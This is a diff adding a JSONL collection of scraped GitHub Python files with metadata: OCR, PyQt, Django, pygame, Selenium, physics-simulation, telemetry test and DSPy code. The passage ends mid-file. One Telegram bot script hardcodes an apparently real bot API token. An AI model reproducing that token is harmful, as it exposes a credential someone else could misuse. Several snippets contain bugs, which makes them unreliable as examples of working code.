diff --git "a/1306.jsonl" "b/1306.jsonl" new file mode 100644--- /dev/null +++ "b/1306.jsonl" @@ -0,0 +1,1020 @@ +{"seq_id": "10645953355", "text": "# -*- encoding: utf-8 -*-\n# @Author: SWHL\n# @Contact: liekkaskono@163.com\nimport time\nimport yaml\n\nfrom rapid_videocr import ExtractSubtitle\nfrom rapid_ocr import TextSystem\n\n\ndef read_yaml(yaml_path):\n with open(yaml_path, 'rb') as f:\n data = yaml.load(f, Loader=yaml.Loader)\n return data\n\n\nif __name__ == '__main__':\n ocr_system = TextSystem('config_ocr.yaml')\n\n config = read_yaml('config_videocr.yaml')\n extractor = ExtractSubtitle(ocr_system, **config)\n\n mp4_path = 'assets/test_video/2.mp4'\n time_start = '00:00:00'\n time_end = '-1'\n\n start_time = time.time()\n ocr_result = extractor(mp4_path, time_start, time_end)\n print(ocr_result)\n print(f'elapse: {time.time() - start_time}s')\n", "repo_name": "xinyiZN/RapidVideOCR", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 731, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "52", "api": [{"api_name": "yaml.load", "line_number": 13, "usage_type": "call"}, {"api_name": "yaml.Loader", "line_number": 13, "usage_type": "attribute"}, {"api_name": "rapid_ocr.TextSystem", "line_number": 18, "usage_type": "call"}, {"api_name": "rapid_videocr.ExtractSubtitle", "line_number": 21, "usage_type": "call"}, {"api_name": "time.time", "line_number": 27, "usage_type": "call"}, {"api_name": "time.time", "line_number": 30, "usage_type": "call"}]} +{"seq_id": "14020092898", "text": "import os\nfrom PyQt5.QtGui import QPixmap\nfrom PyQt5.QtWidgets import QLabel, QFrame\n\n\nclass AddRecordGridLabel(QLabel):\n def __init__(self, name, pixmap, parent=None):\n super().__init__(parent)\n self.name = name\n self.pixmap = pixmap\n self.setPixmap(QPixmap(self.pixmap))\n self.parent = parent\n\n def mouseReleaseEvent(self, event):\n for i in reversed(range(self.parent.gridLayout.count())):\n self.parent.gridLayout.itemAt(i).widget().setFrameStyle(QFrame.NoFrame)\n self.parent.gridLayout.itemAt(i).widget().setStyleSheet(\"border: 2px solid black;\")\n\n self.setStyleSheet(\"border: 4px solid red;\")\n\n self.parent.selectedIcon.setText(self.name)\n\n\n\n\n", "repo_name": "shlomi1074/CommunicationBoard_Prototype", "sub_path": "CustomWidgets/AddRecordGridLabel.py", "file_name": "AddRecordGridLabel.py", "file_ext": "py", "file_size_in_byte": 733, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "PyQt5.QtWidgets.QLabel", "line_number": 6, "usage_type": "name"}, {"api_name": "PyQt5.QtGui.QPixmap", "line_number": 11, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QFrame.NoFrame", "line_number": 16, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets.QFrame", "line_number": 16, "usage_type": "name"}]} +{"seq_id": "28146988540", "text": "\n\nimport logging\nfrom aiogram import Bot, Dispatcher, executor, types\nfrom googletrans import Translator, constantsz\n\ntranslator = Translator()\n\nAPI_TOKEN = '5055886499:AAGobKzugq0q9pDXCTN5nF01OJ6mPWc5oH8'\n\nlogging.basicConfig(level=logging.INFO)\n\nbot = Bot(token=API_TOKEN)\ndp = Dispatcher(bot)\n\n@dp.message_handler(commands=['start', 'help'])\nasync def send_welcome(message: types.Message):\n await message.reply(\"Hi!\\n I'm translator bot!\\n You can use me to translate your projects! \\n I'm powered by Python and Django Developer BoyMirzo!\")\n\n@dp.message_handler()\nasync def echo(message: types.Message):\n translation = translator.translate(message.text, dest=\"\")\n await message.answer(translation.text)\nif __name__ == '__main__':\n executor.start_polling(dp, skip_updates=True)", "repo_name": "Khumoyunm1rzo01/Back-end_New", "sub_path": "Telegram_bot.py", "file_name": "Telegram_bot.py", "file_ext": "py", "file_size_in_byte": 791, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "52", "api": [{"api_name": "googletrans.Translator", "line_number": 7, "usage_type": "call"}, {"api_name": "logging.basicConfig", "line_number": 11, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 11, "usage_type": "attribute"}, {"api_name": "aiogram.Bot", "line_number": 13, "usage_type": "call"}, {"api_name": "aiogram.Dispatcher", "line_number": 14, "usage_type": "call"}, {"api_name": "aiogram.types.Message", "line_number": 17, "usage_type": "attribute"}, {"api_name": "aiogram.types", "line_number": 17, "usage_type": "name"}, {"api_name": "aiogram.types.Message", "line_number": 21, "usage_type": "attribute"}, {"api_name": "aiogram.types", "line_number": 21, "usage_type": "name"}, {"api_name": "aiogram.executor.start_polling", "line_number": 25, "usage_type": "call"}, {"api_name": "aiogram.executor", "line_number": 25, "usage_type": "name"}]} +{"seq_id": "31488474167", "text": "from django.http import HttpResponse, JsonResponse\nfrom django.shortcuts import render, redirect\nfrom .forms import *\nfrom django.views.decorators.csrf import csrf_exempt\nfrom .predict_model import *\n \n# Create your views here.\n@csrf_exempt\ndef index(request):\n if request.method == 'POST':\n form = UploadModelForm(request.POST, request.FILES)\n \n if form.is_valid():\n form.save()\n fileName = request.POST.get(\"fileName\")\n # ETT預測\n ETT_result_1,ETT_result_2,ETT_result_3,ETT_result_4,ettImg =define_dataset(fileName)\n resultImg = ensemble_ett(ETT_result_1,ETT_result_2,ETT_result_3,ETT_result_4)\n ETT_PrintPoint(resultImg,ettImg,fileName)\n\n #return redirect('success')\n return render(request, 'index.html',{'form' : form} ) \n else:\n form = UploadModelForm()\n return render(request, 'index.html',{'form' : form} ) \n \n \ndef success(request):\n return HttpResponse('successfully uploaded')", "repo_name": "ab3223323/ETT_System", "sub_path": "ett/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1015, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.shortcuts.render", "line_number": 22, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 25, "usage_type": "call"}, {"api_name": "django.views.decorators.csrf.csrf_exempt", "line_number": 8, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 29, "usage_type": "call"}]} +{"seq_id": "43230716906", "text": "from django.test import TestCase\nfrom django.urls import reverse\n\nfrom rest_framework.response import Response\n\nfrom main.models import Category, Product\n\n\nclass APITest(TestCase):\n def setUp(self) -> None:\n Category.objects.create(name='cat 1')\n Product.objects.create(\n name='test_name',\n SKU='1234',\n category=Category.objects.get(id=1),\n price=100,\n descr='str descr',\n short_descr='str short_descr'\n )\n self.product_as_response = b'[{\"id\":1,\"name\":\"test_name\",\"SKU\":\"1234\",\"price\":100,\"descr\":\"str descr\",\"short_descr\":\"str short_descr\",\"category\":1}]'\n return super().setUp()\n \n def test_product_api_view(self):\n res = self.client.get(reverse('api:product')) \n self.assertEqual(\n self.product_as_response,\n res.content)\n\n def test_product_filter(self):\n self.assertEqual(self.product_as_response, \n self.client.get(reverse('api:product'),{'id' : 1}).content)\n self.assertEqual(self.product_as_response, \n self.client.get(reverse('api:product'),{'category' : 1}).content)\n self.assertEqual(self.product_as_response, \n self.client.get(reverse('api:product'),{'name' : 'test_name'}).content)\n \n def test_create_product(self):\n self.assertEqual(\n b'{\"id\":2,\"name\":\"test_name\",\"SKU\":\"1234\",\"price\":100,\"descr\":\"str descr\",\"short_descr\":\"str short_descr\",\"category\":1}', \n self.client.post(reverse('api:product'),{\n 'name':'test_name',\n 'SKU':'1234',\n 'category':1,\n 'price':100,\n 'descr':'str descr',\n 'short_descr':'str short_descr'\n }).content)\n \n def test_product_detail(self):\n self.assertEqual(b'{\"id\":1,\"name\":\"test_name\",\"SKU\":\"1234\",\"price\":100,\"descr\":\"str descr\",\"short_descr\":\"str short_descr\",\"category\":1}', \n self.client.get(reverse('api:prod_detail', kwargs={'pk':1})).content)\n\n\n", "repo_name": "DenysDanov/Emmet-Brown-Warehouse", "sub_path": "shop/shop/apps/api/tests.py", "file_name": "tests.py", "file_ext": "py", "file_size_in_byte": 2257, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.test.TestCase", "line_number": 9, "usage_type": "name"}, {"api_name": "main.models.Category.objects.create", "line_number": 11, "usage_type": "call"}, {"api_name": "main.models.Category.objects", "line_number": 11, "usage_type": "attribute"}, {"api_name": "main.models.Category", "line_number": 11, "usage_type": "name"}, {"api_name": "main.models.Product.objects.create", "line_number": 12, "usage_type": "call"}, {"api_name": "main.models.Product.objects", "line_number": 12, "usage_type": "attribute"}, {"api_name": "main.models.Product", "line_number": 12, "usage_type": "name"}, {"api_name": "main.models.Category.objects.get", "line_number": 15, "usage_type": "call"}, {"api_name": "main.models.Category.objects", "line_number": 15, "usage_type": "attribute"}, {"api_name": "main.models.Category", "line_number": 15, "usage_type": "name"}, {"api_name": "django.urls.reverse", "line_number": 24, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 31, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 33, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 35, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 40, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 51, "usage_type": "call"}]} +{"seq_id": "35701014163", "text": "from django.contrib import admin\nfrom django.urls import path\nfrom AppCoder.views import mostrar_agregarprofesora, mostrar_formulario, mostrar_inicio, mostrar_contacto, mostrar_sobrenosotros, mostrar_agregarubicacion, mostrar_formulario_2, mostrar_busqueda, buscar\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('inicio/', mostrar_inicio, name=\"inicio\"),\n path('contacto/', mostrar_contacto, name=\"contacto\"),\n path('sobrenosotros/', mostrar_sobrenosotros, name=\"sobrenosotros\"),\n path('formulario/', mostrar_formulario, name=\"formulario\"),\n path('agregarprofesora/', mostrar_agregarprofesora, name=\"agregarprofesora\"),\n path('agregarubicacion/', mostrar_agregarubicacion, name=\"agregarubicacion\"),\n path('formulario2/', mostrar_formulario_2, name=\"formulario2\"),\n path('busqueda/', mostrar_busqueda, name=\"busqueda\"),\n path('buscar/', buscar),\n \n]", "repo_name": "nachocaceres/python", "sub_path": "AppCoder/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 891, "program_lang": "python", "lang": "es", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.urls.path", "line_number": 6, "usage_type": "call"}, {"api_name": "django.contrib.admin.site", "line_number": 6, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 6, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 7, "usage_type": "call"}, {"api_name": "AppCoder.views.mostrar_inicio", "line_number": 7, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 8, "usage_type": "call"}, {"api_name": "AppCoder.views.mostrar_contacto", "line_number": 8, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "AppCoder.views.mostrar_sobrenosotros", "line_number": 9, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 10, "usage_type": "call"}, {"api_name": "AppCoder.views.mostrar_formulario", "line_number": 10, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 11, "usage_type": "call"}, {"api_name": "AppCoder.views.mostrar_agregarprofesora", "line_number": 11, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 12, "usage_type": "call"}, {"api_name": "AppCoder.views.mostrar_agregarubicacion", "line_number": 12, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 13, "usage_type": "call"}, {"api_name": "AppCoder.views.mostrar_formulario_2", "line_number": 13, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 14, "usage_type": "call"}, {"api_name": "AppCoder.views.mostrar_busqueda", "line_number": 14, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 15, "usage_type": "call"}, {"api_name": "AppCoder.views.buscar", "line_number": 15, "usage_type": "argument"}]} +{"seq_id": "33900806897", "text": "#!/usr/bin/env python3\n\nimport pygame\n# 导入pygame库\n\nfrom sys import exit\n# 向sys模块借一个exit函数用来退出程序\nfrom os import path\n\n# 生成随机数\nimport random\n\n\n# 设置图片目录\nmain_path = path.dirname(__file__)\nassets_folder = path.join(main_path, 'data')\n\nprint(assets_folder)\n\n# 初始化pygame,为使用硬件做准备\npygame.init()\n\n# 创建了一个窗口\nscreen = pygame.display.set_mode((1300, 876), 0, 32)\n\n# 设置窗口标题\npygame.display.set_caption(\"Catch me if you can\")\n\n# 导入背景图\nbg_img = path.join(assets_folder, 'cat_bg.jpg')\nbackground = pygame.image.load(bg_img).convert()\n\n\ndef rand_cats(cat_list):\n \"\"\" 随机得到一只猫\"\"\"\n i = random.randint(0, len(cat_list) - 1)\n cat_img = path.join(assets_folder, cat_list[i])\n cat = pygame.image.load(cat_img).convert_alpha()\n return cat\n\n\n# 讲话用的字体\nfont_name = pygame.font.SysFont('comicsansms', 72)\n\ntext = font_name.render('Meow~', True, (0, 128, 0))\n\n\n# 就这么几只猫\ncats = ['fun_cat1.jpg', 'fun_cat2.jpg',\n 'fun_cat3.jpg', 'fun_cat4.jpg', 'fun_cat5.jpg']\n\n# 将背景图画上去\nscreen.blit(background, (0, 0))\nmouse_cursor = rand_cats(cats)\nscreen.blit(mouse_cursor, (random.randint(0, 1000), random.randint(0, 700)))\n\nwhile True:\n \"\"\" 游戏主循环\"\"\"\n\n pygame.display.update()\n\n # 等待输入\n event = pygame.event.wait()\n if event.type == pygame.QUIT:\n # 接收到退出事件后退出程序\n exit()\n elif event.type == pygame.MOUSEBUTTONUP:\n # 获得鼠标位置\n x, y = pygame.mouse.get_pos()\n # 准备下一个猫\n mouse_cursor = rand_cats(cats)\n\n # 获取猫头的尺寸\n width = mouse_cursor.get_width()\n height = mouse_cursor.get_height()\n\n # 获得新的随机位置\n if x < 650:\n x = random.randint(650, 1300 - width)\n y = random.randint(0, 876 - height)\n else:\n x = random.randint(0, 650 - width)\n y = random.randint(0, 876 - height)\n\n # 画新猫\n screen.blit(background, (0, 0))\n screen.blit(mouse_cursor, (x, y))\n screen.blit(text, (x, y))\n\n else:\n pass\n", "repo_name": "nilingh/pygame_ex", "sub_path": "hello wild.py", "file_name": "hello wild.py", "file_ext": "py", "file_size_in_byte": 2206, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.path.dirname", "line_number": 15, "usage_type": "call"}, {"api_name": "os.path", "line_number": 15, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path", "line_number": 16, "usage_type": "name"}, {"api_name": "pygame.init", "line_number": 21, "usage_type": "call"}, {"api_name": "pygame.display.set_mode", "line_number": 24, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 24, "usage_type": "attribute"}, {"api_name": "pygame.display.set_caption", "line_number": 27, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 27, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path", "line_number": 30, "usage_type": "name"}, {"api_name": "pygame.image.load", "line_number": 31, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 31, "usage_type": "attribute"}, {"api_name": "random.randint", "line_number": 36, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path", "line_number": 37, "usage_type": "name"}, {"api_name": "pygame.image.load", "line_number": 38, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 38, "usage_type": "attribute"}, {"api_name": "pygame.font.SysFont", "line_number": 43, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 43, "usage_type": "attribute"}, {"api_name": "random.randint", "line_number": 55, "usage_type": "call"}, {"api_name": "pygame.display.update", "line_number": 60, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 60, "usage_type": "attribute"}, {"api_name": "pygame.event.wait", "line_number": 63, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 63, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 64, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 66, "usage_type": "call"}, {"api_name": "pygame.MOUSEBUTTONUP", "line_number": 67, "usage_type": "attribute"}, {"api_name": "pygame.mouse.get_pos", "line_number": 69, "usage_type": "call"}, {"api_name": "pygame.mouse", "line_number": 69, "usage_type": "attribute"}, {"api_name": "random.randint", "line_number": 79, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 80, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 82, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 83, "usage_type": "call"}]} +{"seq_id": "37157729866", "text": "import time\nfrom selenium import webdriver\n\ndef getInfo():\n driver = webdriver.Firefox()\n driver.get('http://music.163.com/#/discover/toplist?id=3778678', timeout = 120)\n driver.implicitly_wait(5)\n songs = driver.find_element_by_xpath('//div[@class=\"ttc\"]/span/a/b')\n song_links = driver.find_element_by_xpath('//div[@class = \"ttc\"]/span/a')\n print(songs)\n print(song_links)\n for song, song_link in zip(songs, song_links):\n print(f'{song:<10}{\"https://music.163.com/#\"+song_link:<}')\n driver.quit()\n\ngetInfo()\n", "repo_name": "0Jvang/my-python-career", "sub_path": "网络爬虫/selenium/selenium爬网易云音乐.py", "file_name": "selenium爬网易云音乐.py", "file_ext": "py", "file_size_in_byte": 544, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "selenium.webdriver.Firefox", "line_number": 5, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 5, "usage_type": "name"}]} +{"seq_id": "74479829604", "text": "# Import the rebound module\nimport rebound\nimport os\n\n\ndef replace_snapshot(sim, filename):\n if os.path.isfile(filename):\n os.remove(filename)\n sim.simulationarchive_snapshot(filename)\n\n\ndiv = 100\n\nfilename = \"simulationarchive.bin\"\ntmax = 1 * 3.1415 * 1e5\n\ntry:\n sim = rebound.Simulation.from_archive(filename)\n sim.automateSimulationArchive(filename, interval=tmax / div)\n print(\"Restarting from simulation archive. Last snapshot found at t=%.1f\" % sim.t)\nexcept:\n print(\"Cannot load SimulationArchive. Creating new simulation.\")\n\n sim = rebound.Simulation()\n sim.integrator = 'whfast'\n sim.G = 1\n sim.ri_whfast.safe_mode = 0\n\n sim.collision = 'line'\n # sim.collision_resolve = collision\n\n sim.add(m=1) # star\n r = 0.0001\n sim.add(m=1e-3, P=1, e=0.1, r=r) # planet 1\n sim.add(m=1e-3, P=1.3, e=0.1, r=r) # planet 2\n sim.dt = 3.1415 * 2. * 6. / 365.25 # 6 days in units where G=1\n sim.move_to_com()\n # sim.automateSimulationArchive(filename, interval=tmax/1000, deletefile=True)\n sim.automateSimulationArchive(filename, interval=tmax / div)\n\n\ntry:\n sim.integrate(tmax)\nexcept rebound.Collision:\n replace_snapshot(sim, \"final_collide.bin\")\n\nsa = rebound.SimulationArchive(filename)\nprint(sa[-2].t)\nprint(sa[-1].t)\nprint(sa[-1].t - sa[-2].t)\nprint(tmax / div)\nprint(sim.dt)\nprint(len(sa))\n\nreplace_snapshot(sim, \"final.bin\")\n", "repo_name": "christiangil/ML-Stability", "sub_path": "new_sim_archive_test.py", "file_name": "new_sim_archive_test.py", "file_ext": "py", "file_size_in_byte": 1400, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.path.isfile", "line_number": 7, "usage_type": "call"}, {"api_name": "os.path", "line_number": 7, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 8, "usage_type": "call"}, {"api_name": "rebound.Simulation.from_archive", "line_number": 18, "usage_type": "call"}, {"api_name": "rebound.Simulation", "line_number": 18, "usage_type": "attribute"}, {"api_name": "rebound.Simulation", "line_number": 24, "usage_type": "call"}, {"api_name": "rebound.Collision", "line_number": 44, "usage_type": "attribute"}, {"api_name": "rebound.SimulationArchive", "line_number": 47, "usage_type": "call"}]} +{"seq_id": "20502064847", "text": "import numpy as np\nfrom MoneyModel import MoneyModel\nfrom mesa.visualization.ModularVisualization import (ModularServer,\n VisualizationElement)\nfrom mesa.visualization.modules import ChartModule\n\nclass HistogramModule(VisualizationElement):\n\n package_includes = [\"Chart.min.js\"]\n local_includes = [\"HistogramModule.js\"]\n canvas_height = 200\n canvas_width = 500\n\n def __init__(self, bins, canvas_height, canvas_width):\n self.canvas_height = canvas_height\n self.canvas_width = canvas_width\n self.bins = bins\n new_element = \"new HistogramModule({}, {}, {})\"\n new_element = new_element.format(bins, canvas_width, canvas_height)\n self.js_code = \"elements.push(\" + new_element + \");\"\n\n def render(self, model):\n wealth_vals = [agent.wealth for agent in model.schedule.agents]\n hist = np.histogram(wealth_vals, bins=self.bins)[0]\n\n return [int(x) for x in hist]\n\nchart_element = ChartModule([{\"Label\": \"Gini\", \"Color\": \"Black\"}], \n data_collector_name='dc')\n\nhistogram_element = HistogramModule(list(range(10)), 200, 500)\nserver = ModularServer(MoneyModel, [histogram_element], \"MoneyModel\", 100)\n#server = ModularServer(MoneyModel, [chart_element], \"Money Model\", 100)\nserver.launch()", "repo_name": "scipy-conference/scipy_proceedings_2015", "sub_path": "papers/jacqueline_kazil/MoneyModel_Visualization.py", "file_name": "MoneyModel_Visualization.py", "file_ext": "py", "file_size_in_byte": 1337, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 7, "dataset": "github-code", "pt": "52", "api": [{"api_name": "mesa.visualization.ModularVisualization.VisualizationElement", "line_number": 7, "usage_type": "name"}, {"api_name": "numpy.histogram", "line_number": 24, "usage_type": "call"}, {"api_name": "mesa.visualization.modules.ChartModule", "line_number": 28, "usage_type": "call"}, {"api_name": "mesa.visualization.ModularVisualization.ModularServer", "line_number": 32, "usage_type": "call"}, {"api_name": "MoneyModel.MoneyModel", "line_number": 32, "usage_type": "argument"}]} +{"seq_id": "12508886045", "text": "import mock\nimport tempfile\nimport unittest\n\nfrom telemetry.internal.forwarders import cros_forwarder\nfrom telemetry import decorators\n\n\nclass CrOsSshForwarderTests(unittest.TestCase):\n def setUp(self):\n self._Patch('subprocess') # Do not actually run subprocesses.\n self._Patch('tempfile') # Do not actually create tempfiles.\n self.ReadRemotePort = self._Patch('_ReadRemotePort')\n self.GetUnreservedAvailableLocalPort = self._Patch(\n 'util.GetUnreservedAvailableLocalPort')\n self.cri = mock.Mock()\n\n def _Patch(self, target):\n patcher = mock.patch(\n 'telemetry.internal.forwarders.cros_forwarder.' + target)\n self.addCleanup(patcher.stop)\n return patcher.start()\n\n def testForwarderBasic(self):\n f = cros_forwarder.CrOsSshForwarder(\n self.cri, local_port=111, remote_port=222, port_forward=True)\n self.cri.FormSSHCommandLine.assert_called_once_with(\n ['-NT'], ['-R222:127.0.0.1:111'], port_forward=True)\n self.assertEqual(f.local_port, 111)\n self.assertEqual(f.remote_port, 222)\n\n def testForwarderBasicReverse(self):\n f = cros_forwarder.CrOsSshForwarder(\n self.cri, local_port=111, remote_port=222, port_forward=False)\n self.cri.FormSSHCommandLine.assert_called_once_with(\n ['-NT'], ['-L111:127.0.0.1:222'], port_forward=False)\n self.assertEqual(f.local_port, 111)\n self.assertEqual(f.remote_port, 222)\n\n def testForwarderDefaultRemote(self):\n self.ReadRemotePort.return_value = 444\n f = cros_forwarder.CrOsSshForwarder(\n self.cri, local_port=111, remote_port=None, port_forward=True)\n self.cri.FormSSHCommandLine.assert_called_once_with(\n ['-NT'], ['-R0:127.0.0.1:111'], port_forward=True)\n self.assertEqual(f.local_port, 111)\n self.assertEqual(f.remote_port, 444)\n\n def testForwarderReverseDefaultLocal(self):\n self.GetUnreservedAvailableLocalPort.return_value = 777\n f = cros_forwarder.CrOsSshForwarder(\n self.cri, local_port=None, remote_port=222, port_forward=False)\n self.cri.FormSSHCommandLine.assert_called_once_with(\n ['-NT'], ['-L777:127.0.0.1:222'], port_forward=False)\n self.assertEqual(f.local_port, 777)\n self.assertEqual(f.remote_port, 222)\n\n\nclass ReadRemotePortTests(unittest.TestCase):\n @decorators.Disabled('win') # https://crbug.com/793256\n def testReadRemotePort(self):\n sample_output = [\n '', '', 'Allocated port 42360 for remote forward to localhost:12345']\n\n with tempfile.NamedTemporaryFile() as cros_stderr:\n for line in sample_output:\n cros_stderr.write(line + '\\n')\n cros_stderr.flush()\n remote_port = cros_forwarder._ReadRemotePort(cros_stderr.name)\n\n self.assertEqual(remote_port, 42360)\n", "repo_name": "kiwibrowser/src", "sub_path": "third_party/catapult/telemetry/telemetry/internal/forwarders/cros_forwarder_unittest.py", "file_name": "cros_forwarder_unittest.py", "file_ext": "py", "file_size_in_byte": 2717, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2475, "dataset": "github-code", "pt": "52", "api": [{"api_name": "unittest.TestCase", "line_number": 9, "usage_type": "attribute"}, {"api_name": "mock.Mock", "line_number": 16, "usage_type": "call"}, {"api_name": "mock.patch", "line_number": 19, "usage_type": "call"}, {"api_name": "telemetry.internal.forwarders.cros_forwarder.CrOsSshForwarder", "line_number": 25, "usage_type": "call"}, {"api_name": "telemetry.internal.forwarders.cros_forwarder", "line_number": 25, "usage_type": "name"}, {"api_name": "telemetry.internal.forwarders.cros_forwarder.CrOsSshForwarder", "line_number": 33, "usage_type": "call"}, {"api_name": "telemetry.internal.forwarders.cros_forwarder", "line_number": 33, "usage_type": "name"}, {"api_name": "telemetry.internal.forwarders.cros_forwarder.CrOsSshForwarder", "line_number": 42, "usage_type": "call"}, {"api_name": "telemetry.internal.forwarders.cros_forwarder", "line_number": 42, "usage_type": "name"}, {"api_name": "telemetry.internal.forwarders.cros_forwarder.CrOsSshForwarder", "line_number": 51, "usage_type": "call"}, {"api_name": "telemetry.internal.forwarders.cros_forwarder", "line_number": 51, "usage_type": "name"}, {"api_name": "unittest.TestCase", "line_number": 59, "usage_type": "attribute"}, {"api_name": "tempfile.NamedTemporaryFile", "line_number": 65, "usage_type": "call"}, {"api_name": "telemetry.internal.forwarders.cros_forwarder._ReadRemotePort", "line_number": 69, "usage_type": "call"}, {"api_name": "telemetry.internal.forwarders.cros_forwarder", "line_number": 69, "usage_type": "name"}, {"api_name": "telemetry.decorators.Disabled", "line_number": 60, "usage_type": "call"}, {"api_name": "telemetry.decorators", "line_number": 60, "usage_type": "name"}]} +{"seq_id": "31188011838", "text": "import dsp\nimport tqdm\nimport random\n\nfrom .bootstrap import BootstrapFewShot\nfrom .vanilla import LabeledFewShot\n\nfrom dspy.evaluate.evaluate import Evaluate\n\n\n# TODO: Don't forget dealing with the raw demos.\n# TODO: Deal with the (pretty common) case of having a metric for filtering and a metric for eval\n\n# TODO: There's an extremely strong case (> 90%) to switch this to NOT inherit from BootstrapFewShot.\n# Instead, it should wrap it: during compilation just loop, create a copy to compile, shuffle the full/sampled\n# trainset and compile with that. This will also make it easier to use raw demos.\n# Once all versions exist, define the validation set and evaluate.\n\n# TODO: This function should take a max_budget and max_teacher_budget. That's in the number of program calls.\n# In this case, max_student_budget is max_budget - max_teacher_budget.\n# For max_teacher_budget, this will just limit the total number of things we bootstrap.\n# This can end up implicitly defining the number of candidate programs (i.e., stop when runs out). Cap at 16.\n# For max_student_budget, this will be a more upfront calculation.\n# Right now, it can also just induce the number of candidate programs. Later, it could be used more interestingly\n# for selective early stopping.\n# Progressive elimination sounds about right: after 50 examples, drop bottom third, after 100, another third, etc.\n# until only 3--5 are left for the end. Could also be systematic and add (earlier) stopping based on error bounds.\n# In general, though, the early filtering is just saying: either there are some really bad ones, or some really really\n# good ones, or most things are pretty close. In all of these cases, dropping the bottom third is not going to hurt.\n\n# Also, this function should be efficient in the following way:\n# seed -3, seed -2, and seed -1 so to speak should just be \"zero shot\", \"labeled shots\", and \"bootstrap\" without any tweaks.\n\n\nclass BootstrapFewShotWithRandomSearch(BootstrapFewShot):\n def __init__(self, metric, teacher_settings={}, max_bootstrapped_demos=4, max_labeled_demos=16, max_rounds=1, num_candidate_programs=16, num_threads=6):\n self.metric = metric\n self.teacher_settings = teacher_settings\n self.max_rounds = max_rounds\n\n self.num_threads = num_threads\n\n self.min_num_samples = 1\n self.max_num_samples = max_bootstrapped_demos\n self.num_candidate_sets = num_candidate_programs\n self.max_num_traces = 1 + int(max_bootstrapped_demos / 2.0 * self.num_candidate_sets)\n\n # Semi-hacky way to get the parent class's _boostrap function to stop early.\n self.max_bootstrapped_demos = self.max_num_traces\n self.max_labeled_demos = max_labeled_demos\n\n print(\"Going to sample between\", self.min_num_samples, \"and\", self.max_num_samples, \"traces per predictor.\")\n print(\"Going to sample\", self.max_num_traces, \"traces in total.\")\n print(\"Will attempt to train\", self.num_candidate_sets, \"candidate sets.\")\n\n # self.num_candidate_sets = 1\n\n # import time\n # time.sleep(10)\n\n def _random_search_instance(self, idx):\n print(\"Random search instance\", idx)\n\n rng = random.Random(idx)\n program = self.student.deepcopy()\n\n for predictor in program.predictors():\n sample_size = rng.randint(self.min_num_samples, self.max_num_samples)\n print(f\"[{idx}] \\t Sampling {sample_size} traces from {len(predictor.traces)} traces.\")\n\n augmented_demos = rng.sample(predictor.traces, min(sample_size, len(predictor.traces)))\n\n # TODO: FIXME: Figuring out the raw demos here is a bit tricky. We can't just use the unused nor the unaugmented (validation) ones.\n augmented_uuids = set([x.dspy_uuid for x in augmented_demos])\n raw_demos_uuids = set([x.dspy_uuid for x in predictor.traces if x.dspy_uuid not in augmented_uuids])\n\n raw_demos = [x for x in self.trainset if x.dspy_uuid in raw_demos_uuids]\n raw_demos = rng.sample(raw_demos, min(self.max_labeled_demos - len(augmented_demos), len(raw_demos)))\n\n print(f'Got 